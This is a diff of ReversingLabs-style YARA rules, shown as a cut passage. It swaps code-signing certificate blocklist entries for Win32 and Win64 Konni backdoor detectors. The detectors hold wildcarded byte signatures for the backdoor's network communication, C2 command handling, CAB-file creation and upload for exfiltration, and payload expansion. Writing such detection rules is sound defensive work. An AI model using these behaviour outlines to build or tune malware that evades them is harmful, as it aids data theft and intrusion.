+rule REVERSINGLABS_Win32_Backdoor_Konni : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Konni backdoor."
 		author = "ReversingLabs"
-		id = "6f9852cb-277d-5942-b3f7-525593a41027"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "6fe230b1-357a-54f7-a9a8-15d0369fec71"
+		date = "2023-12-07"
+		modified = "2023-12-07"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5386-L5402"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Win32.Backdoor.Konni.yara#L1-L190"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "eb4387d58e391c356ed774d8c13bb4bbb2befed585bb44674459d3ef519aec58"
+		logic_hash = "7907a657d804d485718ba13bb23513de0b909e7d455c2b3ee193b5329edd3ac6"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "Konni"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$network_communication_p1 = {
+            55 8B EC 83 EC ?? 53 56 8B 35 ?? ?? ?? ?? 57 33 FF 68 ?? ?? ?? ?? 8D 9E ?? ?? ?? ??
+            57 53 89 7D ?? 89 7D ?? 89 7D ?? 89 7D ?? 89 7D ?? 89 5D ?? E8 ?? ?? ?? ?? 8B 45 ??
+            50 56 8D 8E ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ??
+            81 C6 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 57 57 57 6A ?? 57 FF 15 ?? ?? ?? ?? 8B D8 3B DF
+            0F 84 ?? ?? ?? ?? 57 57 6A ?? 57 57 6A ?? 56 53 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 8B F8 89 7D ?? 85 FF 75 ?? 53 FF 15 ?? ?? ?? ?? 8D 47 ?? 5F 5E 5B 8B E5 5D C2 ??
+            ?? 8B 55 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 52 68 ?? ?? ?? ?? 57 C7 45 ?? ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 75 ?? 8B 35 ?? ?? ?? ?? 57 FF D6 53 FF D6 5F
+            5E B8 ?? ?? ?? ?? 5B 8B E5 5D C2 ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ??
+            6A ?? 6A ?? 85 C0 74 ?? 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 50 6A ?? 56
+            FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 57 FF D6 53 FF D6 5F 5E B8 ?? ?? ?? ??
+            5B 8B E5 5D C2 ?? ?? 8B 45 ?? 85 C0 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 8B 35 ??
+            ?? ?? ?? FF D6 57 FF D6 53 FF D6 5F 5E 83 C8 ?? 5B 8B E5 5D C2 ?? ?? 40 50 6A ?? 89
+        }
+		$network_communication_p2 = {
+            45 ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 8B 35 ??
+            ?? ?? ?? FF D6 8B 4D ?? 51 FF D6 53 FF D6 5F 5E 83 C8 ?? 5B 8B E5 5D C2 ?? ?? 8B 55
+            ?? 52 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 6A ?? 6A ?? 6A ??
+            56 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 8B 45 ?? 50 FF D6 53 FF D6 5F 5E 83
+            C8 ?? 5B 8B E5 5D C2 ?? ?? 8B 55 ?? 8D 4D ?? 51 52 57 56 FF 15 ?? ?? ?? ?? 85 C0 74
+            ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 57 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            85 C0 B8 ?? ?? ?? ?? 75 ?? 8B 45 ?? 89 45 ?? 83 F8 ?? 74 ?? 8B 4D ?? 8B 55 ?? 6A ??
+            8D 45 ?? 50 51 57 52 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 01 45 ?? 51 6A ?? 57 E8 ??
+            ?? ?? ?? 8B 45 ?? 83 C4 ?? 8D 55 ?? 52 50 57 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4D
+            ?? 51 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ??
+            56 8B 35 ?? ?? ?? ?? FF D6 8B 55 ?? 52 FF D6 53 FF D6 83 7D ?? ?? 0F 84 ?? ?? ?? ??
+            8B 45 ?? 5F 5E 5B 8B E5 5D C2
+        }
+		$handle_c2_commands_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 8D 85 ?? ?? ?? ??
+            50 33 FF 68 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 89 B5 ?? ?? ?? ??
+            3B F7 75 ?? 83 C8 ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 0D ?? ??
+            ?? ?? 8B 16 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B
+            4E ?? 50 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 56 ?? 68 ?? ?? ?? ?? 52 E8 ?? ??
+            ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4E ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B
+            5E ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 33 C0 57 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 46 ?? 52 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4E ?? 57 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 46 ?? 52 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 85 C0 75 ?? 8B 46 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 69 C0 ?? ?? ?? ?? A3 ??
+            ?? ?? ?? E9 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 56 ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 85
+        }
+		$handle_c2_commands_p2 = {
+            C0 75 ?? 8B 46 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 69 C0 ?? ?? ?? ?? A3 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4C 86 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? BE
+            ?? ?? ?? ?? 85 C0 75 ?? 8D 78 ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33
+            FF E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 06 52 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B
+            44 96 ?? 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 8D ?? ?? ?? ?? 8B 54 8E ?? 68
+            ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 06 8D 50 ?? 8B FF 66 8B 08 83
+            C0 ?? 66 3B CF 75 ?? 2B C2 D1 F8 57 8D 3C 45 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB
+            ?? 8B 06 8D 50 ?? 66 8B 08 83 C0 ?? 66 3B CF 75 ?? 2B C2 D1 F8 6A ?? 8D 3C 45 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? A1 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 54 8E ?? 50
+            52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 48 ?? EB ?? 33 C9 E8 ?? ?? ?? ?? 8B F8 56
+            FF 15 ?? ?? ?? ?? 8B 4D ?? 8B C7 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$create_cab_file_and_upload_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? A1 ?? ?? ?? ?? 53 56 57 33
+            FF 68 ?? ?? ?? ?? 8B F1 8D 95 ?? ?? ?? ?? 33 C9 57 52 89 85 ?? ?? ?? ?? 89 BD ?? ??
+            ?? ?? 89 BD ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 33 C0 57 51 66 89 85 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 66 89
+            85 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 33 D2 50 66 89 95 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 0F B7 8D ?? ?? ?? ?? 0F B7 95 ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 51 0F B7 8D ??
+            ?? ?? ?? 52 0F B7 95 ?? ?? ?? ?? 50 51 52 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 57
+            51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 57 68 ?? ?? ?? ?? 8B C8 51 FF 15 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52
+            FF 15 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B D8 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ??
+            68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ??
+            ?? 83 C4 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 68 ??
+            ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B CE 8D BD ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 F8 ?? 75 ?? 83 C8 ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 57 8D
+        }
+		$create_cab_file_and_upload_p2 = {
+            85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? EB ?? 33 FF 8D 9D ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 3B C7 74 ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ??
+            ?? 8B B5 ?? ?? ?? ?? 83 C6 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 3B C7 74
+            ?? 56 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 3B
+            DF 74 ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? EB ?? 8D 9B ?? ?? ?? ?? 66 8B 08 83 C0 ?? 66 3B
+            CF 75 ?? 2B C2 8D 93 ?? ?? ?? ?? D1 F8 8D 0C 00 33 C0 89 02 89 42 ?? 89 42 ?? 89 42
+            ?? 89 42 ?? 89 42 ?? 89 42 ?? 89 42 ?? 3B CF 74 ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 8B CB EB ?? 33 C9 8B 95 ?? ?? ?? ?? 89 8A ?? ?? ?? ?? 3B CF 0F 84 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 8B
+            BD ?? ?? ?? ?? 8B 87 ?? ?? ?? ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 53 C7 87 ??
+            ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? 8D 9B ?? ?? ?? ??
+            66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 8D 84 46 ?? ?? ?? ?? 50 6A ?? 89 85 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 6A ??
+            53 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 50
+            53 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 56 89 85 ?? ?? ?? ?? 51 03 C3 50 E8 ?? ?? ?? ??
+            8B BD ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 03 FB 83 C4 ?? 03 FE B9 ?? ?? ?? ?? BE ?? ?? ??
+            ?? 50 F3 A5 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? 56 E8
+        }
+		$create_cab_file_and_upload_p3 = {
+            6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 0F 84 ?? ?? ?? ?? 6A ??
+            6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 57 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 85 C0 75 ?? 57 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B 4D ??
+            33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 81 C6 ?? ?? ?? ??
+            6A ?? 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 50 05 ?? ?? ?? ?? 50 68 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ??
+            6A ?? 6A ?? 6A ?? 56 68 ?? ?? ?? ?? 51 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 8B F0 85 F6 75 ?? 8B 95 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 52 FF D6 57 FF D6 B8 ?? ??
+            ?? ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 85 ?? ?? ?? ?? 50 53 6A
+            ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56
+            8B 35 ?? ?? ?? ?? FF D6 8B 8D ?? ?? ?? ?? 51 FF D6 57 FF D6 B8 ?? ?? ?? ?? 5F 5E 5B
+            8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 53 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 95 ??
+            ?? ?? ?? 52 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 8B 35
+            ?? ?? ?? ?? FF D6 8B 85 ?? ?? ?? ?? 50 FF D6 57 FF D6 B8 ?? ?? ?? ?? 5F 5E 5B 8B 4D
+            ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 85 ?? ?? ?? ?? 85 C0 75 ?? 50 50 50 56 FF 15
+            ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 8B 8D ?? ?? ?? ?? 51 FF D6 57 FF D6 83 C8
+        }
+		$create_cab_file_and_upload_p4 = {
+            5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 40 50 6A ?? 89 85 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 8B D8 85 DB 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ??
+            FF D6 8B 95 ?? ?? ?? ?? 52 FF D6 57 FF D6 83 C8 ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ??
+            ?? ?? 8B E5 5D C3 8B 85 ?? ?? ?? ?? 50 6A ?? 53 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83
+            C4 ?? 8D 8D ?? ?? ?? ?? 51 52 53 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 53
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ??
+            ?? FF D6 8B 85 ?? ?? ?? ?? 50 FF D6 57 FF D6 8B 4D ?? 8B 85 ?? ?? ?? ?? 5F 5E 33 CD
+            5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$cmd_expand_payload = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ?? ?? ?? ?? 8B
+            D9 33 FF 8D 8D ?? ?? ?? ?? 33 C0 57 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 33 D2 57 50 66 89 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D
+            ?? ?? ?? ?? 57 51 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ??
+            57 6A ?? 33 C0 68 ?? ?? ?? ?? 53 89 BD ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 57 57 57 6A ?? 57 56 FF
+            15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 3B C7 75 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? 5F 5E 5B
+            8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 57 57 57 6A ?? 50 FF 15 ?? ?? ?? ?? 8B F8
+            85 FF 74 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 6A ?? 8D 47 ?? 50 6A ?? 6A ?? FF 15
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 57 ?? 83 C4 ?? 57 89 95 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 8B 3D ?? ?? ?? ?? 50 FF D7 56 FF D7 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ??
+            51 E8 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ??
+            ?? 83 C4 ?? 33 C0 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 50 50 68 ?? ?? ?? ?? 50
+            50 50 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3 6A
+            ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            8B F0 83 FE ?? 75 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 56 FF D7 8B 4D ?? 8B 85 ?? ??
+            ?? ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Master Networking s.r.o." and pe.signatures [ i ] . serial == "5b:44:0a:47:e8:ce:3d:d2:02:27:1e:5c:7a:66:6c:78" and 1601895571 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $network_communication_p* ) ) and ( all of ( $handle_c2_commands_p* ) ) and ( all of ( $create_cab_file_and_upload_p* ) ) and ( $cmd_expand_payload )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_B82C6553B2186C219797621Aaa233Edb : INFO FILE
+rule REVERSINGLABS_Win64_Backdoor_Konni : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Konni backdoor."
 		author = "ReversingLabs"
-		id = "e1dd9783-078f-582e-8493-7c493cda9c62"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "c45c23c6-be15-58cc-ae4d-631bed4a3bb2"
+		date = "2023-12-07"
+		modified = "2023-12-07"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5404-L5422"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Win64.Backdoor.Konni.yara#L1-L205"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "72e3e1740a4adc4315d2dd9c9f7b8cee2d89c3006014dec663b70d3419f43ca3"
+		logic_hash = "37c45e3ed23ca9f4de876f666c9f6d9bf7eee5cb1650b02cdd9f58e2ccc4b5cb"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "Konni"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$network_communication_p1 = {
+            48 8B C4 53 55 57 41 54 41 55 41 56 41 57 48 83 EC ?? 48 8B 3D ?? ?? ?? ?? 45 33 FF
+            48 8B D9 4C 8D A7 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 49 8B CC 44 89 78 ?? 44 89 78
+            ?? 45 8B F7 44 89 78 ?? 41 8B EF E8 ?? ?? ?? ?? 4C 8D 8F ?? ?? ?? ?? 4C 8D 05 ?? ??
+            ?? ?? BA ?? ?? ?? ?? 49 8B CC 48 89 5C 24 ?? 48 89 7C 24 ?? E8 ?? ?? ?? ?? 48 8D 9F
+            ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 41 BD ?? ?? ?? ?? 45 33 C9 45 33 C0 33 C9 41 8B
+            D5 44 89 7C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 89 44 24 ?? 48 85 C0 75 ?? 83 C8 ??
+            48 83 C4 ?? 41 5F 41 5E 41 5D 41 5C 5F 5D 5B C3 4C 89 7C 24 ?? 44 89 7C 24 ?? 41 B8
+            ?? ?? ?? ?? 45 33 C9 48 8B D3 48 8B C8 C7 44 24 ?? ?? ?? ?? ?? 48 89 B4 24 ?? ?? ??
+            ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 4C 89 7C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F0 48 85
+            C0 0F 84 ?? ?? ?? ?? 4C 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 45
+            33 C9 4D 8B C4 48 8B C8 4C 89 7C 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 4C 89 7C 24
+            ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 45 33 C9 45 33 C0 33 D2 48 8B C8 44 89
+            7C 24 ?? FF 15 ?? ?? ?? ?? 45 33 C9 45 33 C0 48 8B CB 85 C0 74 ?? 48 8D 94 24 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 45 33 C9 48 8B CB 45 33 C0 33 D2 FF 15 ?? ?? ??
+            ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ??
+            41 8B C5 E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 85 C0 75 ?? 48 8B CB EB ?? FF C0 B9 ??
+            ?? ?? ?? 8B D0 89 84 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B E0 48 85 C0 74 ?? 44 8B
+        }
+		$network_communication_p2 = {
+            84 24 ?? ?? ?? ?? 33 D2 48 8B C8 E8 ?? ?? ?? ?? 45 33 C9 4C 89 7C 24 ?? 48 8D 0D ??
+            ?? ?? ?? 45 8D 41 ?? BA ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 4C 8B E8 48 8B CB 48 83 F8 ?? 75 ?? 45 33 C9 45 33 C0 33 D2 FF 15
+            ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ??
+            ?? ?? ?? 83 C8 ?? E9 ?? ?? ?? ?? 44 8B 84 24 ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 49
+            8B D4 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? BF ?? ?? ?? ?? 0F 1F 00 44 39 BC 24
+            ?? ?? ?? ?? 74 ?? 48 8D 15 ?? ?? ?? ?? 49 8B CC 41 8B EF E8 ?? ?? ?? ?? 48 85 C0 0F
+            45 EF 3B EF 74 ?? 44 8B 84 24 ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 49 8B D4 49 8B CD
+            4C 89 7C 24 ?? FF 15 ?? ?? ?? ?? 44 8B 84 24 ?? ?? ?? ?? 44 03 B4 24 ?? ?? ?? ?? 33
+            D2 49 8B CC E8 ?? ?? ?? ?? 44 8B 84 24 ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 49 8B D4
+            48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 7C 24 ?? 49 8B CD FF 15 ??
+            ?? ?? ?? 49 8B CC FF 15 ?? ?? ?? ?? 45 33 C9 45 33 C0 33 D2 48 8B CB FF 15 ?? ?? ??
+            ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ??
+            83 C8 ?? 45 85 F6 0F 44 E8 8B C5 48 8B B4 24 ?? ?? ?? ?? 48 83 C4 ?? 41 5F 41 5E 41
+            5D 41 5C 5F 5D 5B C3
+        }
+		$handle_c2_commands_p1 = {
